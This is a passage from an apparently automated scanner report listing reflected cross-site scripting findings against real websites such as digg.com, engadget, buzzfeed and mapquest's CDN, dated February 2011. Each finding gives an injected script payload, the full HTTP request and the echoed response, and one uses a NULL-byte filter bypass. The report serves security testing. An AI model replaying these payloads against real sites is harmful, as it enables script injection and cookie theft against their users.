a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8", c2:"3005693", c3:"168b81<script>alert(1)</script>efcbb2330ca", c4:"http://www.electronista.com/", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});

1.66. http://b.scorecardresearch.com/beacon.js [c4 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c4 request parameter is copied into the HTML document as plain text between tags. The payload 19807<script>alert(1)</script>acb3208d838 was submitted in the c4 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=2&c2=3005693&c3=1&c4=http%3A%2F%2Fwww.electronista.com%2F19807<script>alert(1)</script>acb3208d838&c5=&c6=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.electronista.com/articles/11/02/04/sales.of.glasses.free.3d.tvs.weaker.than.expected/?e4c13%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ec3b351ab889=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sun, 13 Feb 2011 20:37:00 GMT
Date: Sun, 06 Feb 2011 20:37:00 GMT
Connection: close
Content-Length: 3609

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"2", c2:"3005693", c3:"1", c4:"http://www.electronista.com/19807<script>alert(1)</script>acb3208d838", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});

1.67. http://b.scorecardresearch.com/beacon.js [c5 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c5 request parameter is copied into the HTML document as plain text between tags. The payload 7f924<script>alert(1)</script>327a9db5a54 was submitted in the c5 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=3005693&c3=1&c4=http%3A%2F%2Fwww.electronista.com%2F&c5=7f924<script>alert(1)</script>327a9db5a54&c6=&c10=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.electronista.com/articles/11/02/04/sales.of.glasses.free.3d.tvs.weaker.than.expected/?e4c13%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ec3b351ab889=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sun, 13 Feb 2011 20:37:01 GMT
Date: Sun, 06 Feb 2011 20:37:01 GMT
Connection: close
Content-Length: 3609

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8", c2:"3005693", c3:"1", c4:"http://www.electronista.com/", c5:"7f924<script>alert(1)</script>327a9db5a54", c6:"", c10:"", c15:"", c16:"", r:""});

1.68. http://b.scorecardresearch.com/beacon.js [c6 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c6 request parameter is copied into the HTML document as plain text between tags. The payload 3ca5d<script>alert(1)</script>9482817c403 was submitted in the c6 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=3005693&c3=1&c4=http%3A%2F%2Fwww.electronista.com%2F&c5=&c6=3ca5d<script>alert(1)</script>9482817c403&c10=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.electronista.com/articles/11/02/04/sales.of.glasses.free.3d.tvs.weaker.than.expected/?e4c13%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ec3b351ab889=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sun, 13 Feb 2011 20:37:01 GMT
Date: Sun, 06 Feb 2011 20:37:01 GMT
Connection: close
Content-Length: 3609

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8", c2:"3005693", c3:"1", c4:"http://www.electronista.com/", c5:"", c6:"3ca5d<script>alert(1)</script>9482817c403", c10:"", c15:"", c16:"", r:""});

1.69. http://chinese.engadget.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://chinese.engadget.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2cbb5"-alert(1)-"5dc800f9cb0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?2cbb5"-alert(1)-"5dc800f9cb0=1 HTTP/1.1
Host: chinese.engadget.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:20:13 GMT
Server: Apache/2.2
Set-Cookie: PHPSESSID=b6e935c068e11c437828996cb5eedd00; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=60
Pragma: no-cache
Keep-Alive: timeout=5, max=999957
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 87716

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta content="text/html
...[SNIP]...
engadgetch";
s_265.pageType="";
s_265.linkInternalFilters="javascript:,chinese.engadget.com";
s_265.mmxgo = true;
s_265.prop1="Inactive";
s_265.prop2="Home";
s_265.prop12="http://chinese.engadget.com/?2cbb5"-alert(1)-"5dc800f9cb0=1";
s_265.prop16="Engadget &#20013;&#25991;&#29256;";
s_265.prop17="";
s_265.prop18="";
s_265.prop19="";
s_265.prop20="";
s_265.prop21="dtc";
s_265.prop22="219";

var s_code=s_265.t();if(s_code)docume
...[SNIP]...

1.70. http://cn.engadget.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cn.engadget.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8582e"-alert(1)-"5a7ac817e08 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?8582e"-alert(1)-"5a7ac817e08=1 HTTP/1.1
Host: cn.engadget.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:20:15 GMT
Server: Apache/2.2
Set-Cookie: PHPSESSID=4095b140c77d5796eb3685694b1e6a1c; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=60
Pragma: no-cache
Keep-Alive: timeout=5, max=999973
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 91999

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta content="text/html" c
...[SNIP]...
nnel="wb.engadgetchs";
s_265.pageType="";
s_265.linkInternalFilters="javascript:,cn.engadget.com";
s_265.mmxgo = true;
s_265.prop1="Inactive";
s_265.prop2="Home";
s_265.prop12="http://cn.engadget.com/?8582e"-alert(1)-"5a7ac817e08=1";
s_265.prop16="Engadget &#20013;&#22269;&#29256;";
s_265.prop17="";
s_265.prop18="";
s_265.prop19="";
s_265.prop20="";
s_265.prop21="dtc";
s_265.prop22="223";

var s_code=s_265.t();if(s_code)docume
...[SNIP]...

1.71. http://coverage.mqcdn.com/coverage [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://coverage.mqcdn.com
Path:   /coverage

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8d259<script>alert(1)</script>3ed25b9c15a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /coverage8d259<script>alert(1)</script>3ed25b9c15a?format=json&jsonp=MQA._covCallback&loc=-97.12,32.53,-96.47,33.04&scale=324767&cat=map%2Chyb%2Csat HTTP/1.1
Host: coverage.mqcdn.com
Proxy-Connection: keep-alive
Referer: http://www.mapquest.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sun, 06 Feb 2011 19:49:51 GMT
Server: Apache/2.2.13 (Unix) mod_ssl/2.2.13 OpenSSL/0.9.8e-fips-rhel5 mod_wsgi/2.5 Python/2.6.2
Connection: close
Content-Type: text/html
Content-Length: 247

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /coverage8d259<script>alert(1)</script>3ed25b9c15a was not found on this server.</p>
...[SNIP]...

1.72. http://coverage.mqcdn.com/coverage [cat parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://coverage.mqcdn.com
Path:   /coverage

Issue detail

The value of the cat request parameter is copied into the HTML document as plain text between tags. The payload 70953<script>alert(1)</script>a0406af2794 was submitted in the cat parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /coverage?format=json&jsonp=MQA._covCallback&loc=-97.12,32.53,-96.47,33.04&scale=324767&cat=map%2Chyb%2Csat70953<script>alert(1)</script>a0406af2794 HTTP/1.1
Host: coverage.mqcdn.com
Proxy-Connection: keep-alive
Referer: http://www.mapquest.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 400 BAD REQUEST
Date: Sun, 06 Feb 2011 19:49:51 GMT
Server: Apache/2.2.13 (Unix) mod_ssl/2.2.13 OpenSSL/0.9.8e-fips-rhel5 mod_wsgi/2.5 Python/2.6.2
Connection: close
Content-Type: text/plain
Content-Length: 46

'sat70953<script>alert(1)</script>a0406af2794'

1.73. http://coverage.mqcdn.com/coverage [jsonp parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://coverage.mqcdn.com
Path:   /coverage

Issue detail

The value of the jsonp request parameter is copied into the HTML document as plain text between tags. The payload 3e48a<script>alert(1)</script>1db30dff717 was submitted in the jsonp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /coverage?format=json&jsonp=MQA._covCallback3e48a<script>alert(1)</script>1db30dff717&loc=-97.12,32.53,-96.47,33.04&scale=324767&cat=map%2Chyb%2Csat HTTP/1.1
Host: coverage.mqcdn.com
Proxy-Connection: keep-alive
Referer: http://www.mapquest.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 19:49:51 GMT
Server: Apache/2.2.13 (Unix) mod_ssl/2.2.13 OpenSSL/0.9.8e-fips-rhel5 mod_wsgi/2.5 Python/2.6.2
Connection: close
Content-Type: text/javascript
Content-Length: 1129

MQA._covCallback3e48a<script>alert(1)</script>1db30dff717({"map": [{"opt": false, "copyrights": [{"text": "NAVTEQ", "html": "<img align='top' src='http://tile21.mqcdn.com/res/ntcopy_dark.gif' width='45' height='11' class='mqacopyswitch mqacopyswitchdark'>
...[SNIP]...

1.74. http://coverage.mqcdn.com/coverage [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://coverage.mqcdn.com
Path:   /coverage

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 77427<script>alert(1)</script>26ea7b496e3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /coverage?format=json&jsonp=MQA._covCallback&loc=-97.12,32.53,-96.47,33.04&scale=324767&cat=map%2Chyb%2Csat&77427<script>alert(1)</script>26ea7b496e3=1 HTTP/1.1
Host: coverage.mqcdn.com
Proxy-Connection: keep-alive
Referer: http://www.mapquest.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 19:49:51 GMT
Server: Apache/2.2.13 (Unix) mod_ssl/2.2.13 OpenSSL/0.9.8e-fips-rhel5 mod_wsgi/2.5 Python/2.6.2
Connection: close
Content-Type: text/javascript
Content-Length: 1091

MQA._covCallback({"map": [{"opt": false, "copyrights": [{"text": "NAVTEQ", "html": "<img align='top' src='http://tile21.mqcdn.com/res/ntcopy_dark.gif' width='45' height='11' class='mqacopyswitch mqaco
...[SNIP]...
lse, "copyrights": [{"text": "i-cubed", "html": null, "group": "Imagery", "id": "i3"}], "id": "i3"}]},"format=json&jsonp=MQA._covCallback&loc=-97.12,32.53,-96.47,33.04&scale=324767&cat=map%2Chyb%2Csat&77427<script>alert(1)</script>26ea7b496e3=1")

1.75. http://coverage.mqcdn.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://coverage.mqcdn.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a95f9<script>alert(1)</script>13b395b7000 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icoa95f9<script>alert(1)</script>13b395b7000 HTTP/1.1
Host: coverage.mqcdn.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sun, 06 Feb 2011 20:14:35 GMT
Server: Apache/2.2.13 (Unix) mod_ssl/2.2.13 OpenSSL/0.9.8e-fips-rhel5 mod_wsgi/2.5 Python/2.6.2
Connection: close
Content-Type: text/html
Content-Length: 250

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /favicon.icoa95f9<script>alert(1)</script>13b395b7000 was not found on this server.</p>
...[SNIP]...

1.76. http://ct.buzzfeed.com/wd/UserWidget [or parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ct.buzzfeed.com
Path:   /wd/UserWidget

Issue detail

The value of the or request parameter is copied into the HTML document as plain text between tags. The payload 2d744<script>alert(1)</script>660425639af was submitted in the or parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wd/UserWidget?u=popeater&to=1&or=vb2d744<script>alert(1)</script>660425639af&wid=1&cb=1297025740300 HTTP/1.1
Host: ct.buzzfeed.com
Proxy-Connection: keep-alive
Referer: http://www.popeater.com/?8e6b4%22-alert(document.cookie)-%227668b18d7c7=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 500 Internal Server Error
Content-Type: text/html; charset=ISO-8859-1
Date: Sun, 06 Feb 2011 20:54:55 GMT
Server: lighttpd bf1
Content-Length: 577

bless({
"-file" => "lib/buzzfeed/wd/controller/UserWidget.pm",
"-line" => 130,
"-package" => "buzzfeed::wd::controller::UserWidget",
"-text" => "unable to fetch user widget: http://terminal3.buzzfeed.com/bf2/_user_widget?or=vb2d744<script>alert(1)</script>660425639af&wid=1&to=1&u=popeater - Internal Server Error",
}, "Error::Simple")

unable to fetch user widget: http://terminal3.buzzfeed.com/bf2/_user_widget?or=vb2d744<script>
...[SNIP]...

1.77. http://ct.buzzfeed.com/wd/UserWidget [u parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ct.buzzfeed.com
Path:   /wd/UserWidget

Issue detail

The value of the u request parameter is copied into the HTML document as plain text between tags. The payload c17bd<script>alert(1)</script>ad8b15919de was submitted in the u parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wd/UserWidget?u=popeaterc17bd<script>alert(1)</script>ad8b15919de&to=1&or=vb&wid=1&cb=1297025740300 HTTP/1.1
Host: ct.buzzfeed.com
Proxy-Connection: keep-alive
Referer: http://www.popeater.com/?8e6b4%22-alert(document.cookie)-%227668b18d7c7=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 500 Internal Server Error
Content-Type: text/html; charset=ISO-8859-1
Date: Sun, 06 Feb 2011 20:54:54 GMT
Server: lighttpd bf2
Content-Length: 577

bless({
"-file" => "lib/buzzfeed/wd/controller/UserWidget.pm",
"-line" => 130,
"-package" => "buzzfeed::wd::controller::UserWidget",
"-text" => "unable to fetch user widget: http://terminal3.buzzfeed.com/bf2/_user_widget?or=vb&wid=1&to=1&u=popeaterc17bd<script>alert(1)</script>ad8b15919de - Internal Server Error",
}, "Error::Simple")

unable to fetch user widget: http://terminal3.buzzfeed.com/bf2/_user_widget?or=vb&wid=1&to=1&u=popeaterc17bd<script>
...[SNIP]...

1.78. http://digg.com/submit [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://digg.com
Path:   /submit

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0016d7e"><script>alert(1)</script>7af3d5b7b03 was submitted in the REST URL parameter 1. This input was echoed as 16d7e"><script>alert(1)</script>7af3d5b7b03 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /submit%0016d7e"><script>alert(1)</script>7af3d5b7b03 HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:19:40 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: traffic_control=1168415921484595456%3A180; expires=Mon, 07-Feb-2011 20:19:40 GMT; path=/; domain=digg.com
Set-Cookie: d=be2907c0c177c974ef36013a41f21c4ec1594088a0d83e4b6f2cc9a8e23c2cb4; expires=Sat, 06-Feb-2021 06:27:20 GMT; path=/; domain=.digg.com
X-Digg-Time: D=255425 10.2.130.111
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 15619

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>error_ - Digg</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics, technology
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Digg" href="/submit%0016d7e"><script>alert(1)</script>7af3d5b7b03.rss">
...[SNIP]...

1.79. http://dm.de.mookie1.com/2/B3DM/2010DM/1117431738@x23 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/1117431738@x23

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5623a"><script>alert(1)</script>d0b27ad4f84 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM5623a"><script>alert(1)</script>d0b27ad4f84/2010DM/1117431738@x23?USNetwork/RS_SDYN_2011Q1_AOL_DEF_300 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.parentdish.com/_uac/adpage.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2545525d5f4f58455e445a4a423660; session=1297024969|1297024970

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:52:05 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 334
Content-Type: text/html

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM5623a"><script>alert(1)</script>d0b27ad4f84/2010DM/1082784961/x23/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><
...[SNIP]...

1.80. http://dm.de.mookie1.com/2/B3DM/2010DM/1117431738@x23 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/1117431738@x23

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bdebb"><script>alert(1)</script>b54197732d3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DMbdebb"><script>alert(1)</script>b54197732d3/1117431738@x23?USNetwork/RS_SDYN_2011Q1_AOL_DEF_300 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.parentdish.com/_uac/adpage.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2545525d5f4f58455e445a4a423660; session=1297024969|1297024970

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:52:08 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 334
Content-Type: text/html

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DMbdebb"><script>alert(1)</script>b54197732d3/1449399697/x23/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><
...[SNIP]...

1.81. http://dm.de.mookie1.com/2/B3DM/2010DM/1117431738@x23 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/1117431738@x23

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 803d1"><script>alert(1)</script>26ba130f8ba was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DM/1117431738@x23803d1"><script>alert(1)</script>26ba130f8ba?USNetwork/RS_SDYN_2011Q1_AOL_DEF_300 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.parentdish.com/_uac/adpage.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
